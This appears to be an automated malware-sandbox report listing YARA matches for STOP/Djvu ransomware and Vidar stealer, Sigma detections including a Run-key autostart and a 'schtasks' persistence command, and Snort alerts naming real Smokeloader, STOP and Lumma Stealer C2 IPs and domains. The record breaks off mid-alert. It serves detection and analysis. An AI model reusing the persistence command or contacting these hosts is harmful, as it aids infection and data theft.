8.2.1601.exe.49515a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
19.2.build2.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
15.2.1601.exe.49615a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
15.2.1601.exe.49615a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
15.2.1601.exe.49615a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
34.2.1601.exe.48c15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
34.2.1601.exe.48c15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
34.2.1601.exe.48c15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
38.2.1601.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
38.2.1601.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
38.2.1601.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
17.2.1601.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
17.2.1601.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
17.2.1601.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
28.2.1601.exe.48d15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
28.2.1601.exe.48d15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
28.2.1601.exe.48d15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
13.2.1601.exe.48e15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
13.2.1601.exe.48e15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
13.2.1601.exe.48e15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
29.2.1601.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
29.2.1601.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
29.2.1601.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
15.2.1601.exe.49615a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
15.2.1601.exe.49615a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
15.2.1601.exe.49615a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
34.2.1601.exe.48c15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
34.2.1601.exe.48c15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
34.2.1601.exe.48c15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
16.2.1601.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
16.2.1601.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
16.2.1601.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
29.2.1601.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
29.2.1601.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
29.2.1601.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
9.2.1601.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
9.2.1601.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
9.2.1601.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
8.2.1601.exe.49515a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
8.2.1601.exe.49515a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
8.2.1601.exe.49515a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
28.2.1601.exe.48d15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
28.2.1601.exe.48d15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
28.2.1601.exe.48d15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
38.2.1601.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
38.2.1601.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
38.2.1601.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
9.2.1601.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
9.2.1601.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
9.2.1601.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
Click to see the 75 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe" --AutoStart, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\1601.exe, ProcessId: 5136, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\fcbhtea, CommandLine: C:\Users\user\AppData\Roaming\fcbhtea, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\fcbhtea, NewProcessName: C:\Users\user\AppData\Roaming\fcbhtea, OriginalFileName: C:\Users\user\AppData\Roaming\fcbhtea, ParentCommandLine: , ParentImage: , ParentProcessId: 1040, ProcessCommandLine: C:\Users\user\AppData\Roaming\fcbhtea, ProcessId: 7992, ProcessName: fcbhtea

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe", CommandLine: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe" , ParentImage: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe, ParentProcessId: 4460, ParentProcessName: build3.exe, ProcessCommandLine: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe", ProcessId: 4576, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Snort Signatures

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:49:16.877758
SID:	2039103
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:49:16.288373
SID:	2039103
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:48:48.921116
SID:	2039103
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:49:14.776251
SID:	2039103
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:49:13.567114
SID:	2039103
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:49:22.058745
SID:	2039103
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN STOP Ransomware CnC Activity - Source IP: 192.168.2.10 - Destination IP: 189.195.132.134

Timestamp:	04/04/24-17:49:06.460714
SID:	2833438
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) - Source IP: 192.168.2.10 - Destination IP: 172.67.217.100

Timestamp:	04/04/24-17:49:20.631293
SID:	2050742
Source Port:	49767
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:48:57.003394
SID:	2039103
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:48:52.580955
SID:	2039103
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) - Source IP: 192.168.2.10 - Destination IP: 172.67.217.100

Timestamp:	04/04/24-17:49:10.679091
SID:	2050742
Source Port:	49741
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:48:59.993121
SID:	2039103
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) - Source IP: 192.168.2.10 - Destination IP: 172.67.217.100

Timestamp:	04/04/24-17:49:22.188335
SID:	2050742
Source Port:	49771
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:48:50.780975
SID:	2039103
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Lumma Stealer Related Domain in DNS Lookup (resergvearyinitiani .shop) - Source IP: 192.168.2.10 - Destination IP: 1.1.1.1

Timestamp:	04/04/24-17:49:10.536596
SID:	2050741
Source Port:	60115
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (resergvearyinitiani .shop in TLS SNI) - Source IP: 192.168.2.10 - Destination IP: 172.67.217.100

Timestamp:	04/04/24-17:49:11.885746
SID:	2050742
Source Port:	49744
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:48:58.821524
SID:	2039103
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.10 - Destination IP: 193.106.175.76

Timestamp:	04/04/24-17:48:49.556280
SID:	2039103
Source Port:	49710
Destination Port:	80
